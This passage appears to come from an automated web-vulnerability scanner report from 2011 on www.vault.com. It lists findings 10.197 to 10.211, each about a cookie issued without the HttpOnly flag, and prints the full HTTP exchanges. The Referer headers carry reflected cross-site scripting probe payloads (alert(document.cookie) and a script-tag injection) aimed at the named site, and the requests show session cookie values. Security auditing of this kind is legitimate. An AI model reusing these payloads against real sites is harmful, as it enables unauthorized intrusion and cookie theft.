The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_569724.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 26 Aug 2009 19:28:23 GMT
ETag: "b48963-b7a-744ba3c0"
Accept-Ranges: bytes
Content-Length: 2938
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:34 GMT;path=/

GIF89a..H.................\j........&.
,..-..4.&<.*=.;O.7G.Zu.GU.{..R`.w..q|........*..)..*..,..(....    1.    ,..7.....>..6..6.+N..............,..-...................................................D\.....
...[SNIP]...

10.197. http://www.vault.com/images/sponsors/sponsor_6100.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_6100.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_6100.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 23 Jun 2009 11:04:22 GMT
ETag: "b4896d-638-f3f29980"
Accept-Ranges: bytes
Content-Length: 1592
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:33 GMT;path=/

GIF89a..H.................q.P.................h. {.0..@..`..p................................hsz......q|.{.............................................................................................
...[SNIP]...

10.198. http://www.vault.com/images/sponsors/sponsor_6603.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_6603.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_6603.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Dec 2009 16:29:00 GMT
ETag: "b488ff-51a-5f380b00"
Accept-Ranges: bytes
Content-Length: 1306
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:34 GMT;path=/

GIF89a..H..........hij............s.......................}{|............734......OLM........................!.......,......H.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n.o.....
...[SNIP]...

10.199. http://www.vault.com/images/sponsors/sponsor_7285.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_7285.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_7285.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 24 Jun 2009 12:45:49 GMT
ETag: "b4894f-a09-7c9a3940"
Accept-Ranges: bytes
Content-Length: 2569
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/

GIF89a..H.....................................KGD}zx.........urp.........njh.........qmk......a][c_]YUR...........................fba...........................tpn......jfd......hdb.........QLJ.......
...[SNIP]...

10.200. http://www.vault.com/images/sponsors/sponsor_819.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_819.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_819.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 28 Oct 2010 12:44:30 GMT
ETag: "f10005-13b7-b3f9e780"
Accept-Ranges: bytes
Content-Length: 5047
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:32 GMT;path=/

GIF89a..H...........kn.MM.ln.z.............wx{...579................6?FFI............ffi............UVY.......)4...$%(.............ll.............)+...............................68.......9?..........
...[SNIP]...

10.201. http://www.vault.com/images/sponsors/sponsor_906.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_906.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_906.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 23 Jun 2009 11:04:20 GMT
ETag: "b48897-782-f3d41500"
Accept-Ranges: bytes
Content-Length: 1922
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:33 GMT;path=/

GIF89a..H..........mnq........................yxz.....................AAB.........}|~......YY[........................EEF...............xz|302.........!.....><>......bbe...............................
...[SNIP]...

10.202. http://www.vault.com/images/sponsors/sponsor_9066.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_9066.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_9066.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:23:35 GMT
ETag: "b48785-37b-7b4877c0"
Accept-Ranges: bytes
Content-Length: 891
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:33 GMT;path=/

GIF89a..H...........................W...Nk.n...............Qs!.......,......H......I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z$P<.    . ._,..zB........o...    .npx..xp|..o....y.
...[SNIP]...

10.203. http://www.vault.com/images/sponsors/sponsor_923.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_923.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_923.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 19:23:35 GMT
ETag: "b48932-7d9-51dc1bc0"
Accept-Ranges: bytes
Content-Length: 2009
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:33 GMT;path=/

GIF89a..H........eh....3:.35....6D.')lll.%).*5.37.,;.32......!.......,......H......I..8....`(.V1....Ra.p,....N..M.....E+...B .H...F pH...6%.".........@M...
."`h$..Ax.O...    =j=m=.n...u..N-D}.E\.....
...[SNIP]...

10.204. http://www.vault.com/images/store/covers/626-small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/store/covers/626-small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/store/covers/626-small.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utmx=199986601.00007137521316125233:2:1-1-1; __utmxx=199986601.00007137521316125233:2666322:2592000; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.9.8.1295451480077; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000RodsoOG0cpZlCSlcifaR0Rn:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:45 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 21 Jan 2010 16:48:29 GMT
ETag: "b40070-204c-78f65140"
Accept-Ranges: bytes
Content-Length: 8268
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:49 GMT;path=/

GIF89aP......GewE\g....Ge..I...i........Xv...%.i.......{.....u.................6Xrby............:.;T...-Qk...Sjv':D7JU......+Kd....+6...$Uv............1Tn......
,B....2E........y..&...................
...[SNIP]...

10.205. http://www.vault.com/images/store/covers/759-small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/store/covers/759-small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/store/covers/759-small.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 24 Dec 2009 00:51:50 GMT
ETag: "b4017f-163f-d8289580"
Accept-Ranges: bytes
Content-Length: 5695
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:29 GMT;path=/

GIF89aP................I......G..........................................x.....%2Xnot.........KKQ.....;Sd..........ISn......y}....1/5......7Fp.........~.............................dt.......
.+.......
...[SNIP]...

10.206. http://www.vault.com/images/store/covers/888-small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/store/covers/888-small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/store/covers/888-small.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:02 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 20 Nov 2009 17:07:59 GMT
ETag: "b40106-1ab9-8489d9c0"
Accept-Ranges: bytes
Content-Length: 6841
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:06 GMT;path=/

GIF89aP..............q.......fL.../H....M5qH2.................*ppqg.%...Hf.&4
.|eM(.......l:&...LMM.&
#.    /.,....xbP7"...qTD.[@.....K.sb.t[.eF.{Z>X...y.....cOK/..|..H....kW..c....g7sr1.....v..h..>Vu..
...[SNIP]...

10.207. http://www.vault.com/images/subheader_background2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/subheader_background2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/subheader_background2.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 26 Jul 2010 15:39:52 GMT
ETag: "ae0354-1dc-320da200"
Accept-Ranges: bytes
Content-Length: 476
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:14 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

10.208. http://www.vault.com/images/subheader_bottom2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/subheader_bottom2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/subheader_bottom2.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 26 Jul 2010 15:39:42 GMT
ETag: "ae0355-d43-31750b80"
Accept-Ranges: bytes
Content-Length: 3395
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:13 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

10.209. http://www.vault.com/images/subheader_top3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/subheader_top3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/subheader_top3.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 26 Jul 2010 15:39:37 GMT
ETag: "ae0356-271-3128c040"
Accept-Ranges: bytes
Content-Length: 625
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:13 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

10.210. http://www.vault.com/images/vault_logo_new.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/vault_logo_new.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/vault_logo_new.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 23 Jun 2010 13:42:40 GMT
ETag: "ae033e-2ab6-b6267400"
Accept-Ranges: bytes
Content-Length: 10934
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:29 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................E....
...[SNIP]...

10.211. http://www.vault.com/scripts/Tools.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/Tools.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/Tools.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 05 Mar 2009 21:44:30 GMT
ETag: "b184dc-62e-12b2eb80"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:13 GMT;path=/
Content-Length: 1582

function toggleDisplayId(id) {
   
   if (document.getElementById(id).style.display == 'block') {
       
       document.getElementById(id).style.display = 'none';
       
   } else {
       
       document.getEle
